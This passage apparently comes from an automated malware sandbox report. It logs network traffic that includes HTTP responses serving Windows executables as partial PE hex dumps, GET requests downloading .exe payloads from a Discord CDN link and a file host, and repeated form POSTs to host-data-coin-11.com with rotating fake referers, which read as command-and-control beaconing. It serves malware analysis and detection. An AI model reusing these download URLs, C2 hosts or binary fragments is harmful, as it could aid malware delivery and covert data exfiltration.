00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Wed, 01 Dec 2021 09:04:40 GMTContent-Type: application/x-msdos-programContent-Length: 163328Connection: closeLast-Modified: Tue, 30 Nov 2021 16:21:14 GMTETag: "27e00-5d203f23b200e"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 53 ec f2 5f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0a 00 00 42 01 00 00 ec 74 02 00 00 00 00 12 2a 00 00 00 10 00 00 00 60 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 40 76 02 00 04 00 00 78 5b 03 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 44 e8 01 00 78 00 00 00 00 b0 75 02 18 83 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 61 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 95 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 60 01 00 64 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 50 40 01 00 00 10 00 00 00 42 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 7e 90 00 00 00 60 01 00 00 92 00 00 00 46 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 60 75 73 02 00 00 02 00 00 18 00 00 00 d8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 66 65 66 65 67 00 00 72 02 00 00 00 80 75 02 00 04 00 00 00 f0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 67 75 79 75 73 00 00 70 02 00 00 00 90 75 02 00 04 00 00 00 f4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 60 2e 76 65 6e 75 00 00 00 17 00 00 00 00 a0 75 02 00 02 00 00 00 f8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 60 2e 72 73 72 63 00 00 00 18 83 00 00 00 b0 75 02 00 84 00 00 00 fa 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Wed, 01 Dec 2021 09:04:44 GMTContent-Type: application/x-msdos-programContent-Length: 351744Connection: closeLast-Modified: Wed, 01 Dec 2021 09:04:02 GMTETag: "55e00-5d211f48282b5"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 bf 4f 57 03 fb 2e 39 50 fb 2e 39 50 fb 2e 39 50 68 60 a1 50 fa 2e 39 50 94 58 92 50 d5 2e 39 50 94 58 a7 50 e2 2e 39 50 94 58 93 50 79 2e 39 50 f2 56 aa 50 f8 2e 39 50 fb 2e 38 50 18 2e 39 50 94 58 96 50 fa 2e 39 50 94 58 a3 50 fa 2e 39 50 94 58 a4 50 fa 2e 39 50 52 69 63 68 fb 2e 39 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 96 a5 06 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 fe 03 00 00 40 09 00 00 00 00 00 40 cf 01 00 00 10 00 00 00 10 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 70 0d 00 00 04 00 00 f5 45 06 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 14 f8 03 00 28 00 00 00 00 e0 0c 00 c0 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 0d 00 30 1d 00 00 c0 13 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 c4 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 6c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 be fc 03 00 00 10 00 00 00 fe 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 40 cc 08 00 00 10 04 00 00 de 00 00 00 02 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 c0 40 00 00 00 e0 0c 00 00 42 00 00 00 e0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d4 3b 00 00 00 30 0d 00 00 3c 00 00 00 22 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Wed, 01 Dec 2021 09:04:47 GMTContent-Type: application/x-msdos-programContent-Length: 336896Connection: closeLast-Modified: Wed, 01 Dec 2021 09:04:01 GMTETag: "52400-5d211f4808eb5"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 bf 4f 57 03 fb 2e 39 50 fb 2e 39 50 fb 2e 39 50 68 60 a1 50 fa 2e 39 50 94 58 92 50 d5 2e 39 50 94 58 a7 50 e2 2e 39 50 94 58 93 50 79 2e 39 50 f2 56 aa 50 f8 2e 39 50 fb 2e 38 50 18 2e 39 50 94 58 96 50 fa 2e 39 50 94 58 a3 50 fa 2e 39 50 94 58 a4 50 fa 2e 39 50 52 69 63 68 fb 2e 39 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 84 c6 f3 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 c4 03 00 00 40 09 00 00 00 00 00 c0 95 01 00 00 10 00 00 00 e0 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 40 0d 00 00 04 00 00 c9 6e 05 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 94 be 03 00 28 00 00 00 00 b0 0c 00 c0 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0d 00 30 1d 00 00 c0 13 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 8b 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 6c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 3e c3 03 00 00 10 00 00 00 c4 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 40 cc 08 00 00 e0 03 00 00 de 00 00 00 c8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 c0 40 00 00 00 b0 0c 00 00 42 00 00 00 a6 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 b6 3b 00 00 00 00 0d 00 00 3c 00 00 00 e8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Wed, 01 Dec 2021 09:04:53 GMTContent-Type: application/x-msdos-programContent-Length: 2740224Connection: closeLast-Modified: Sun, 28 Nov 2021 10:30:25 GMTETag: "29d000-5d1d6cff91027"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 07 f6 17 4c 43 97 79 1f 43 97 79 1f 43 97 79 1f 57 fc 7a 1e 48 97 79 1f 57 fc 7c 1e e5 97 79 1f 57 fc 7d 1e 51 97 79 1f 57 fc 7e 1e 42 97 79 1f 11 e2 7d 1e 52 97 79 1f 11 e2 7a 1e 56 97 79 1f 11 e2 7c 1e 69 97 79 1f 57 fc 78 1e 50 97 79 1f 43 97 78 1f d0 97 79 1f f6 e2 70 1e 44 97 79 1f f6 e2 86 1f 42 97 79 1f f6 e2 7b 1e 42 97 79 1f 52 69 63 68 43 97 79 1f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 77 37 a3 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 1d 00 40 03 00 00 1c 01 00 00 00 00 00 10 52 46 00 00 10 00 00 00 50 03 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 6e 00 00 04 00 00 e5 b2 2a 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 fb 90 04 00 f8 00 00 00 00 a0 04 00 d8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 20 20 20 20 20 ed 3e 03 00 00 10 00 00 00 90 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 20 20 20 20 20 20 20 20 04 da 00 00 00 50 03 00 00 50 00 00 00 94 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 20 20 20 20 20 20 20 20 24 18 00 00 00 30 04 00 00 04 00 00 00 e4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 e0 01 00 00 00 50 04 00 00 02 00 00 00 e8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 20 20 20 20 20 20 20 20 1c 22 00 00 00 60 04 00 00 1e 00 00 00 ea 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 69 64 61 74 61 00 00 00 10 00 00 00 90 04 00 00 02 00 00 00 08 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 00 10 00 00 00 a0 04 00 00 02 00 00 00 0a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 68 65 6d 69 64 61 00 a0 41 00 00 b0 04 00 00 00 00 00 00 0c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 e0 2e 62 6f 6f 74 00 00 00 00 c4 27 00 00 50 46 00 00 c4 27 00 00 0c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.2Date: Wed, 01 Dec 2021 09:05:00 GMTContent-Type: application/x-msdos-programContent-Length: 645592Connection: closeLast-Modified: Thu, 21 Oct 2021 11:48:30 GMTETag: "9d9d8-5cedb79317f80"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 13 00 ea 98 3d 53 00 76 08 00 3f 0c 00 00 e0 00 06 21 0b 01 02 15 00 d0 06 00 00 e0 07 00 00 06 00 00 58 10 00 00 00 10 00 00 00 e0 06 00 00 00 90 60 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 20 09 00 00 06 00 00 38 c3 0a 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 b0 07 00 98 19 00 00 00 d0 07 00 4c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 fc 27 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 07 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac d1 07 00 70 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c0 ce 06 00 00 10 00 00 00 d0 06 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 30 60 2e 64 61 74 61 00 00 00 b0 0f 00 00 00 e0 06 00 00 10 00 00 00 d6 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 c0 2e 72 64 61 74 61 00 00 24 ad 00 00 00 f0 06 00 00 ae 00 00 00 e6 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 40 2e 62 73 73 00 00 00 00 98 04 00 00 00 a0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 40 c0 2e 65 64 61 74 61 00 00 98 19 00 00 00 b0 07 00 00 1a 00 00 00 94 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 4c 0a 00 00 00 d0 07 00 00 0c 00 00 00 ae 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 18 00 00 00 00 e0 07 00 00 02 00 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 f0 07 00 00 02 00 00 00 bc 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 fc 27 00 00 00 00 08 00 00 28 00 00 00 be 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 60 01 00 00 00 30 08 00 00 02 00 00 00 e6 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 c8 03 00 00 00 40 08 00 00 04 00 00 00 e8 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 35 00 00 00 00 00 4d 06 00 00 00 50 08 00 00 08 00 00 00 ec 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 35 31 00 00 00 00 00 60 43 00 00 00 60 08 00 00 44 00 00 00 f4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 36 33 00 00 00 00 00 84 0d 00 00 00 b0 0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Wed, 01 Dec 2021 09:05:01 GMTContent-Type: application/x-msdos-programContent-Length: 1143000Connection: closeLast-Modified: Tue, 30 Nov 2021 20:10:32 GMTETag: "1170d8-5d2072645dc9e"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 70 1c 69 a3 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 30 00 00 60 11 00 00 06 00 00 00 00 00 00 9e 7e 11 00 00 20 00 00 00 80 11 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 11 00 00 02 00 00 09 35 12 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 0f 00 00 00 00 00 00 00 00 00 00 00 50 7e 11 00 4b 00 00 00 00 80 11 00 bc 02 00 00 00 00 00 00 00 00 00 00 00 68 11 00 d8 08 00 00 00 a0 11 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a4 5e 11 00 00 20 00 00 00 60 11 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 bc 02 00 00 00 80 11 00 00 04 00 00 00 62 11 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 11 00 00 02 00 00 00 66 11 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 7e 11 00 00 00 00 00 48 00 00 00 02 00 05 00 00 18 02 00 dc 5f 05 00 03 00 00 00 da 07 00 06 dc 77 07 00 eb 89 06 00 c1 7d 11 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 42 28 89 08 00 06 7e 53 02 00 04 28 81 0c 00 06 2a 00 00 00 13 30 04 00 04 00 00 00 00 00 00 00 00 00 14 2a 42 28 89 08 00 06 7e 53 02 00 04 28 81 0c 00 06 2a 00 00 00 12 00 00 17 2a 00 00 00 42 28 89 08 00 06 7e 53 02 00 04 28 81 0c 00 06 2a 00 00 00 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 04 00 04 00 00 00 00 00 00 00 00 00 17 2a 13 30 04 00 04 00 00 00 00 00 00 00 00 00 17 2a 13 30 04 00 04 00 00 00 00 00 00 00 00 00 16 2a 42 28 89 08 00 06 7e 53 02 00 04 28 81 0c 00 06 2a 00 00 00 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 04 00 04 00 00 00 00 00 00 00 00 00 14 2a 42 28 89 08 00 06 7e 53 02 00 04 28 81 0c 00 06 2a 00 00 00 12 00 00 17 2a 00 00 00 13 30 04 00 04 00 00 00 00 00 00 00 00 00 17 2a 13 30 04 00 04 00 00 00 00 00 00 00 00 00 17 2a 13 30 0a 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 0d 00 04 00 00 00 00 00 00 00 00 00 14 2a 42 28 89 08 00 06 7e 53 02 00 04 28 81 0c 00 06 2a 00
                        Source: global trafficHTTP traffic detected: GET /attachments/914960103592054858/914961866462232616/Oldening.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: cdn.discordapp.com
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yubswhv.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 293Host: host-data-coin-11.com
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jmuwhyhn.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 316Host: host-data-coin-11.com
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://piyyyphtem.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 257Host: host-data-coin-11.com
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://llalic.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 268Host: host-data-coin-11.com
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://higvbe.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 283Host: host-data-coin-11.com
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nvrwtjsdku.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 276Host: host-data-coin-11.com
                        Source: global trafficHTTP traffic detected: GET /files/8723_1638191106_2017.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: host-file-host-3.com
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mojyvpeoe.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 334Host: host-data-coin-11.com
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yaoomuahu.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 364Host: host-data-coin-11.com
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dgpnslqhh.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 343Host: host-data-coin-11.com
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gbbxygekjk.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 231Host: host-data-coin-11.com
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://namawqf.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 308Host: host-data-coin-11.com
